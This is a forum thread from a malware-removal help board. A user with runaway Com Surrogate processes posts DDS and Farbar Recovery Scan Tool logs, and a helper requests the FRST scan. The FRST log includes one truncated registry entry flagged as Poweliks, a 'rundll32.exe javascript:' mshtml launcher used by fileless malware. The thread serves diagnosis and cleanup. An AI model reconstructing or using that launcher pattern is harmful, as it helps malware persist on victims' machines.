Multiple dllhost.exe/Com Surrogate processes running


  • This topic is locked
10 replies to this topic

#1 mcgrotty

  • Members
  • 5 posts

Posted 19 July 2014 - 09:16 PM

Hello,

 

I'm having the same problem as talked about in http://www.bleepingcomputer.com/forums/t/525236/30-dllhostexe32-com-surrogate-processes-running-cant-kill/ (which itself was based on another thread) and sure could use some help.

 

As described, I am constantly having 2 to 3 dozen instances of Com Surrogate opening up for no reason whatsoever, ending up using enough resources as to make any other application not be responsive, due to lack of resources. All I can do is keep Task Manager open and close them, one at a time, every time it happens (every 4 or 5 minutes). Luckily, I was able to once get a DDS scan (6 times it locked up before finishing). The only problem is I couldn't get it to ever complete when the Com Surrogates were running, so they aren't in the logs.

 

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 9.0.8112.16561
Run by MikeandBert at 15:16:19 on 2014-07-19
Microsoft® Windows Vista™ Home Premium   6.0.6002.2.1252.1.1033.18.1790.813 [GMT -7:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {108DAC43-C256-20B7-BB05-914135DA5160}
AV: AVG Anti-Virus Free Edition 2012 *Enabled/Updated* {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}
SP: AVG Anti-Virus Free Edition 2012 *Enabled/Updated* {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}
SP: Microsoft Security Essentials *Enabled/Updated* {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ================
.
C:\PROGRA~1\AVG\AVG2012\avgrsx.exe
C:\Program Files\AVG\AVG2012\avgcsrvx.exe
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\nvvsvc.exe
C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe
C:\Windows\system32\SLsvc.exe
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\Windows\system32\nvvsvc.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\agrsmsvc.exe
C:\Program Files\AVG\AVG2012\avgwdsvc.exe
C:\Program Files\Google\Update\1.3.24.15\GoogleCrashHandler.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\System32\WUDFHost.exe
C:\Program Files\AVG\AVG2012\AVGIDSAgent.exe
C:\Program Files\AVG\AVG2012\avgnsx.exe
C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\AVG\AVG2012\avgtray.exe
C:\Windows\V0415Mon.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Program Files\FinePixViewerS\QuickDCF2.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Windows\explorer.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\system32\Taskmgr.exe
C:\Windows\System32\mobsync.exe
C:\Program Files\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
C:\Windows\system32\wuauclt.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\vssvc.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\wuauclt.exe
C:\Windows\SoftwareDistribution\Download\Install\MSEInstall.exe
d:\ad7ad658e1ede53e8e60d9a3790b\epplauncher.exe
d:\ad7ad658e1ede53e8e60d9a3790b\x86\Setup.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\System32\svchost.exe -k swprv
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://www.google.com/
uSearch Bar = Preserve
uSearch Page = hxxp://www.google.com
mStart Page = hxxp://homepage.emachines.com/rdr.aspx?b=ACEW&l=0409&s=1&o=vp32&d=1006&m=el1210-09
uSearchURL,(Default) = hxxp://www.google.com/search/?q=%s
uURLSearchHooks: {32b29df0-2237-4370-9a29-37cebb730e9b} - <orphaned>
uURLSearchHooks: {b2bf7b3f-bf0b-4c48-aec6-f92c51be63e1} - <orphaned>
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelperShim.dll
BHO: AVG Do Not Track: {31332EEF-CB9F-458F-AFEB-D30E9A66B6BA} - c:\program files\avg\avg2012\avgdtiex.dll
BHO: DivX Plus Web Player HTML5 <video>: {326E768D-4182-46FD-9C16-1449A49795F4} - c:\program files\divx\divx plus web player\npdivx32.dll
BHO: AVG Safe Search: {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - c:\program files\avg\avg2012\avgssie.dll
BHO: DivX HiQ: {593DDEC6-7468-4cdd-90E1-42DADAA222E9} - c:\program files\divx\divx plus web player\npdivx32.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - c:\program files\microsoft office\office12\GrooveShellExtensions.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - c:\program files\java\jre6\bin\jp2ssv.dll
uRun: [ehTray.exe] c:\windows\ehome\ehTray.exe
uRun: [ROC_ROC_APR2013_AV] c:\users\mikeandbert\appdata\roaming\avg april 2013 campaign\AVG-Secure-Search-Update.exe /PROMPT --mid 4c3a92315fe1dd717e851537e9f968fa-1652e8e61a40f8e82af9031c84a1aefb502cf7b7 --CMPID ROC_APR2013_AV --CMPIDEXTRA 2012
uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe
uRun: [AVG-Secure-Search-Update_0913a] c:\users\mikeandbert\appdata\roaming\avg 0913a campaign\AVG-Secure-Search-Update-0913a.exe /PROMPT --mid 4c3a92315fe1dd717e851537e9f968fa-1652e8e61a40f8e82af9031c84a1aefb502cf7b7 --CMPID 0913a
mRun: [Windows Defender] c:\program files\windows defender\MSASCui.exe -hide
mRun: [RtHDVCpl] RtHDVCpl.exe
mRun: [eRecoveryService] <no file>
mRunOnce: [AvgUninstallURL] cmd.exe /c start http://www.avg.com/ww.special-uninstallation-feedback-app?lic="&"inst=NwA3AC0ANAAxADMANAA1ADgANwAwADIALQBGAFAAOQArADYALQBCAEEAUgA5AEcAKwAxAC0AVABCADkAKwAyAC0ARgBMACsAOQAtAFgATwAzADYAKwAxAC0ARgA5AE0ANwBDACsANQAtAEYAOQBNADEAMABCACsAMQA"&"prod=0"&"ver=9.0.894
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\exifla~1.lnk - c:\program files\finepixviewers\QuickDCF2.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:0
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: Sothink SWF Catcher - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\program files\microsoft office\office12\ONBttnIE.dll
IE: {68BCFFE1-A2DA-4B40-9068-87ECBFC19D16} - {68BCFFE1-A2DA-4B40-9068-87ECBFC19D16} - c:\program files\avg\avg2012\avgdtiex.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - c:\program files\common files\sourcetec\swf catcher\InternetExplorer.htm
LSP: %SYSTEMROOT%\system32\nvLsp.dll
DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} - hxxp://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} - hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: {8B67B37E-1AE2-4B99-B8CF-55AF4D58DF0D} - file:///F:/win/setup/iamce.dll
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} - hxxp://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
DPF: {D8C67FF7-548E-45FD-9B87-0F77758B6B26} - hxxp://redirect.interactual.com/iakey/iakeycomp/109326/iakey.dll
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
TCP: NameServer = 192.168.1.1
TCP: Interfaces\{EF6BA016-F284-490A-B0CE-D80828CE6304} : DHCPNameServer = 192.168.1.1
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - c:\program files\microsoft office\office12\GrooveSystemServices.dll
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - c:\program files\avg\avg2012\avgpp.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\program files\common files\skype\Skype4COM.dll
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - c:\program files\microsoft office\office12\GrooveShellExtensions.dll
LSA: Security Packages =  kerberos msv1_0 schannel wdigest tspkg
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\36.0.1985.125\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\mikeandbert\appdata\roaming\mozilla\firefox\profiles\icjdnhbo.default\
FF - prefs.js: keyword.URL - hxxp://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=
FF - plugin: c:\program files\adobe\reader 10.0\reader\air\nppdf32.dll
FF - plugin: c:\program files\checkpoint\zaforcefield\trustchecker\bin\npFFApi.dll
FF - plugin: c:\program files\divx\divx ovs helper\npovshelper.dll
FF - plugin: c:\program files\divx\divx plus web player\npdivx32.dll
FF - plugin: c:\program files\google\google earth\plugin\npgeplugin.dll
FF - plugin: c:\program files\google\update\1.3.21.115\npGoogleUpdate3.dll
FF - plugin: c:\program files\java\jre6\bin\new_plugin\npdeployJava1.dll
FF - plugin: c:\program files\microsoft silverlight\4.0.60831.0\npctrlui.dll
FF - plugin: c:\users\mikeandbert\appdata\locallow\unity\webplayer\loader\npUnity3D32.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_3_300_257.dll
.
============= SERVICES / DRIVERS ===============
.
R0 AVGIDSHX;AVGIDSHX;c:\windows\system32\drivers\avgidshx.sys [2012-4-19 24896]
R0 Avgrkx86;AVG Anti-Rootkit Driver;c:\windows\system32\drivers\avgrkx86.sys [2012-1-31 31952]
R0 gfibto;gfibto;c:\windows\system32\drivers\gfibto.sys [2012-12-2 13560]
R1 Avgldx86;AVG AVI Loader Driver;c:\windows\system32\drivers\avgldx86.sys [2012-11-8 250080]
R1 Avgmfx86;AVG Mini-Filter Resident Anti-Virus Shield;c:\windows\system32\drivers\avgmfx86.sys [2011-12-23 41040]
R1 Avgtdix;AVG TDI Driver;c:\windows\system32\drivers\avgtdix.sys [2013-4-11 302368]
R1 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2011-4-18 165648]
R2 AVGIDSAgent;AVGIDSAgent;c:\program files\avg\avg2012\avgidsagent.exe [2013-10-16 5175856]
R2 avgwd;AVG WatchDog;c:\program files\avg\avg2012\avgwdsvc.exe [2012-2-14 193288]
R2 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2008-1-20 21504]
R2 Stereo Service;NVIDIA Stereoscopic 3D Driver Service;c:\program files\nvidia corporation\3d vision\nvSCPAPISvr.exe [2013-1-18 383264]
R3 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\drivers\avgidsdriverx.sys [2012-12-10 142176]
R3 AVGIDSFilter;AVGIDSFilter;c:\windows\system32\drivers\avgidsfilterx.sys [2011-12-23 24144]
R3 AVGIDSShim;AVGIDSShim;c:\windows\system32\drivers\avgidsshimx.sys [2011-12-23 17232]
R3 MpNWMon;Microsoft Malware Protection Network Driver;c:\windows\system32\drivers\MpNWMon.sys [2011-4-18 43392]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\drivers\NisDrvWFP.sys [2011-4-27 65024]
R3 NisSrv;Microsoft Network Inspection;c:\program files\microsoft security client\antimalware\NisSrv.exe [2011-4-27 208944]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2013-10-23 172192]
S3 V0415Vid;Creative Live! Cam Video IM Ultra Driver;c:\windows\system32\drivers\V0415Vid.sys [2009-8-3 286208]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2013-9-11 770168]
.
=============== File Associations ===============
.
FileExt: .js: Applications\notepad.exe=c:\windows\system32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2014-07-19 21:55:47 -------- d-----w- C:\FRST
2014-07-18 23:51:28 8217224 ----a-w- c:\programdata\microsoft\microsoft antimalware\definition updates\{0b65a92b-ee0c-42f7-aa78-a2113504c383}\mpengine.dll
2014-06-25 17:59:41 -------- d-----w- c:\users\mikeandbert\appdata\local\Adobe
.
==================== Find3M  ====================
.
2014-07-08 18:28:13 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-07-08 18:28:13 699056 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-06-07 00:19:04 2051072 ----a-w- c:\windows\system32\win32k.sys
2014-06-06 23:12:01 1810432 ----a-w- c:\windows\system32\jscript9.dll
2014-06-06 23:03:02 1427968 ----a-w- c:\windows\system32\inetcpl.cpl
2014-06-06 23:02:16 1129472 ----a-w- c:\windows\system32\wininet.dll
2014-06-06 22:57:04 142848 ----a-w- c:\windows\system32\ieUnatt.exe
2014-06-06 22:56:20 421376 ----a-w- c:\windows\system32\vbscript.dll
2014-06-06 22:52:42 2382848 ----a-w- c:\windows\system32\mshtml.tlb
2014-06-06 22:51:59 11776 ----a-w- c:\windows\system32\mshta.exe
2014-06-06 08:59:38 506880 ----a-w- c:\windows\system32\qedit.dll
2014-05-30 06:53:22 273408 ----a-w- c:\windows\system32\drivers\afd.sys
2014-04-26 16:01:22 502784 ----a-w- c:\windows\system32\usp10.dll
2012-03-19 06:40:26 174008 ----a-w- c:\program files\2pres.dll
.
============= FINISH: 15:17:16.76 ===============
 


 


#2 aharonov

  • Malware Response Team
  • 2,441 posts

Posted 20 July 2014 - 03:34 AM

Hi there,

please run a FRST scan:


Please download Farbar Recovery Scan Tool and save it to your Desktop.
  • Start FRST with administrator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.


#3 mcgrotty

  • Topic Starter

  • Members
  • 5 posts

Posted 20 July 2014 - 02:24 PM

Thank you.

 

FRST file:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:20-07-2014
Ran by MikeandBert (administrator) on HOME-PC on 20-07-2014 12:20:30
Running from C:\Users\MikeandBert\Desktop\com fix
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgrsx.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgcsrvx.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Agere Systems) C:\Windows\System32\agrsmsvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgwdsvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgnsx.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.24.15\GoogleCrashHandler.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2012\avgtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Creative Technology Ltd.) C:\Windows\V0415Mon.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Microsoft Corporation) C:\Program Files\Windows Media Player\wmpnscfg.exe
(FUJIFILM Corporation) C:\Program Files\FinePixViewerS\QuickDCF2.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Corporation) C:\Program Files\Windows Media Player\wmplayer.exe

==================== Registry (Whitelisted) ==================

HKLM\...\RunOnce: [AvgUninstallURL] => cmd.exe /c start http://www.avg.com/ww.special-uninstallation-feedback-app?lic="&"inst=NwA3AC0ANAAxA (the data entry has 174 more characters).
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...\Run: [ROC_ROC_APR2013_AV] => C:\Users\MikeandBert\AppData\Roaming\AVG April 2013 Campaign\AVG-Secure-Search-Update.exe /PROMPT -- (the data entry has 119 more characters).
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...\Run: [WMPNSCFG] => C:\Program Files\Windows Media Player\WMPNSCFG.exe [202240 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...\Run: [AVG-Secure-Search-Update_0913a] => C:\Users\MikeandBert\AppData\Roaming\AVG 0913a Campaign\AVG-Secure-Search-Update-0913a.exe /PROMPT - (the data entry has 93 more characters).
HKU\S-1-5-21-165418536-3136176592-1450045568-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplica (the data entry has 289 more characters). <==== Poweliks!
HKU\S-1-5-21-165418536-3136176592-1450045568-1003\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Exif Launcher S.lnk
ShortcutTarget: Exif Launcher S.lnk -> C:\Program Files\FinePixViewerS\QuickDCF2.exe (FUJIFILM Corporation)
ShellIconOverlayIdentifiers: GDriveBlacklistedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedEditOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedViewOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncingOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
BootExecute: autocheck autochk * C:\PROGRA~1\AVG\AVG2012\avgrsx.exe /sync /restart

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://homepage.emachines.com/rdr.aspx?b=ACEW&l=0409&s=1&o=vp32&d=1006&m=el1210-09
URLSearchHook: HKCU - (No Name) - {32b29df0-2237-4370-9a29-37cebb730e9b} -  No File
URLSearchHook: HKCU - (No Name) - {b2bf7b3f-bf0b-4c48-aec6-f92c51be63e1} -  No File
SearchScopes: HKLM - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW
SearchScopes: HKLM - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACEW
SearchScopes: HKLM - {bbbf3d02-0068-423f-8c68-0fd1c6e50b38} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^AW6^xdm003^YYA^us&si=CMS-0uq3jL8CFYpefgodSKIAuQ&ptb=076451AA-4DB5-4C8B-83DA-61CCA08D46B3&ind=2014062122&n=780c262a&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKCU - DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7GGLL_en
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = http://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7GGLL_en
SearchScopes: HKCU - {bbbf3d02-0068-423f-8c68-0fd1c6e50b38} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^AW6^xdm003^YYA^us&si=CMS-0uq3jL8CFYpefgodSKIAuQ&ptb=076451AA-4DB5-4C8B-83DA-61CCA08D46B3&ind=2014062122&n=780c262a&psa=&st=sb&searchfor={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: AVG Do Not Track -> {31332EEF-CB9F-458F-AFEB-D30E9A66B6BA} -> C:\Program Files\AVG\AVG2012\avgdtiex.dll (AVG Technologies CZ, s.r.o.)
BHO: DivX Plus Web Player HTML5 <video> -> {326E768D-4182-46FD-9C16-1449A49795F4} -> C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files\AVG\AVG2012\avgssie.dll (AVG Technologies CZ, s.r.o.)
BHO: DivX HiQ -> {593DDEC6-7468-4cdd-90E1-42DADAA222E9} -> C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
Toolbar: HKCU - No Name - {32B29DF0-2237-4370-9A29-37CEBB730E9B} -  No File
Toolbar: HKCU - No Name - {EE2AC4E5-B0B0-4EC6-88A9-BCA1A32AB107} -  No File
DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} http://appldnld.apple.com.edgesuite.net/content.info.apple.com/QuickTime/qtactivex/qtplugin.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: {8B67B37E-1AE2-4B99-B8CF-55AF4D58DF0D} file:///F:/win/setup/iamce.dll
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
DPF: {D8C67FF7-548E-45FD-9B87-0F77758B6B26} http://redirect.interactual.com/iakey/iakeycomp/109326/iakey.dll
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG2012\avgpp.dll (AVG Technologies CZ, s.r.o.)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Winsock: Catalog9 01 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Winsock: Catalog9 02 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Winsock: Catalog9 03 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Winsock: Catalog9 14 %SYSTEMROOT%\system32\nvLsp.dll [163840] (NVIDIA)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\MikeandBert\AppData\Roaming\Mozilla\Firefox\Profiles\icjdnhbo.default
FF Keyword.URL: hxxp://www.google.com/search?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&q=
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 - C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @checkpoint.com/FFApi - C:\Program Files\CheckPoint\ZAForceField\TrustChecker\bin\npFFApi.dll No File
FF Plugin: @divx.com/DivX Browser Plugin,version=1.0.0 - C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @Google.com/GoogleEarthPlugin - C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @java.com/JavaPlugin - C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @nvidia.com/3DVision - C:\Program Files\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
